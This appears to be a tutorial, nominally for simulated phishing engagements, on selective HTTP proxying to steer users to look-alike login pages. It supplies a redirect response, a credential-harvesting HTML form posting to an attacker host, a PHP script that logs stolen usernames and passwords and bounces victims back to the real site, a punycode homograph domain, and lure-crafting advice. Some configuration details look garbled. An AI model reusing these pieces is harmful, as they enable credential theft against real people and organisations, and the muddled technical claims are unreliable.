Selective HTTP Proxying: Enhancing Targeted Phishing Delivery

When conducting simulated phishing engagements, the ability to deliver payloads accurately is paramount. Selective HTTP proxying offers a sophisticated method to manipulate network traffic, ensuring that your payloads are effectively delivered while remaining undetected. This technique can significantly enhance your engagement’s realism and precision, allowing for a higher yield of successful phishing attempts. After reading this article, you’ll be equipped to integrate selective HTTP proxying into your phishing toolset, reinforcing your campaigns with a nuanced approach to payload delivery.

Prerequisites and Setup

Before heading into the mechanics of selective HTTP proxying, you must ensure that you have the required tools and configurations. Start with a solid proxy tool like Burp Suite or Fiddler, which allows for granular control over HTTP requests and responses. You’ll need a server capable of running these tools and a target environment where the proxy can be feasibly deployed.

For instance, Burp Suite requires Java to be installed. You can download and run the community edition with the following command:


java -jar /path/to/burpsuite_community.jar

This command launches Burp Suite, providing you with an interface through which you can intercept and modify HTTP traffic. Ensure that network traffic can flow through your proxy. This might necessitate changing the browser or application settings of the target environment to route through your proxy.

Configure Burp to listen on a specific interface, typically localhost, using a preferred port:


proxy.intercept_requests_location = "www.target-portal.com"

Adjust this setting to filter and intercept HTTP traffic targeting the specific domain where your phishing attempt will be executed (e.g., www.target-portal.com).

Step-by-Step Execution

Intercepting Traffic

To begin intercepting traffic, initiate Burp’s intercept mode and direct the target’s browser to the phishing site via the proxy. For a compelling execution, ensure the proxy only intercepts traffic meant for the phishing pages.


Intercept -> Response to this request



HTTP/1.1 301 Moved Permanently



Location: https://www.secure-auth.xyz/login?session=abc123

This code snippet demonstrates redirecting a legitimate login attempt to your controlled phishing page. The 301 HTTP response code plays a crucial role here, as it transparently reroutes the user from the targeted URL to your crafted payload phishing page.

Payload Delivery

Design the payload to appear as a typical login screen from the organization you are testing. Leverage HTML and JavaScript to mimic familiar interfaces. Use HTTPS to convey credibility, employing a Certificate Authority (CA) like Let’s Encrypt for free certificates.


&lt;form action="https://www.secure-auth.xyz/process_login" method="post"&gt;

  &lt;input type="text" name="user" placeholder="Enter username" required&gt;

  &lt;input type="password" name="pass" placeholder="Enter password" required&gt;

  &lt;input type="submit" value="Sign In"&gt;

&lt;/form&gt;

This code outlines a simple yet effective credential harvesting form. Ensure the design matches the targeted company’s typical web styles to lower suspicion, increasing the chance of user interaction. Validate form entries using JavaScript to add authenticity.

Relaying Data

Once credentials are captured, forward them to a backend server you control. This process is critical and must be swiftly executed to facilitate upcoming engagements without arousing suspicion.


<?php

if ($_SERVER["REQUEST_METHOD"] === "POST") {

  $user = $_POST["user"];

  $pass = $_POST["pass"];

  

  $fp = fopen('compromised_credentials.txt', 'a');

  fwrite($fp, "User: $user, Password: $pass\n");

  fclose($fp);



  header('Location: https://www.target-corp.com/dashboard');

  exit;

} else {

  echo 'Invalid request.';

}

?>

This PHP script securely stores credentials and then redirects the user to the legitimate website to avoid raising red flags. Make sure the file permissions and server security measures are in place to mitigate unintended data exposure.

Advanced Variations

Domain Spoofing

Take advantage of IDN homographs to craft domains that appear legitimate. Using international domain names can make URLs hard to distinguish visually from official web addresses.


https://xn--microsft-xcc.com/login

This example uses punycode to create a URL that seems similar to a company’s domain when viewed in specific browsers, leading to potential sleight-of-hand attacks.

Stealth Link Injection

Embed your payload link into innocuous-looking redirects or as a part of a compelling narrative in email bodies. Consider multi-stage delivery, starting with a harmless redirect that eventually leads to the payload.


Click <a href="https://www.safe-check.deposit.com">here</a> to secure your account!

This approach will deter suspicion by leveraging interception-based man-in-the-middle techniques. Links are crafted to look legitimate but lead through a path that enables payload execution efficiently.

Good / Better / Best

Good: Deliver using suspicious domains and generic emails.
Better: Use closest domain look-a-like IDs and personalize the email to a known company-type correspondence.
Best: Incorporate internal corporate insights within the email content and use meticulous design emulation to closely mimic target environments.

For example, instead of using generic phishing landing pages, the best practice involves embedding known business references and communication styles into the content of the phishing page, ensuring that the design closely matches corporate norms.

Related Concepts

Understanding the nuances of selective HTTP proxying aligns closely with other techniques such as HTML smuggling and DNS-based tunneling. These approaches similarly utilize existing web protocols creatively to deliver robust phishing campaigns. As you advance your methods, integrate DNS tunneling to obscure payload delivery or use HTML smuggling to hide malicious scripts within seemingly non-threatening HTML files.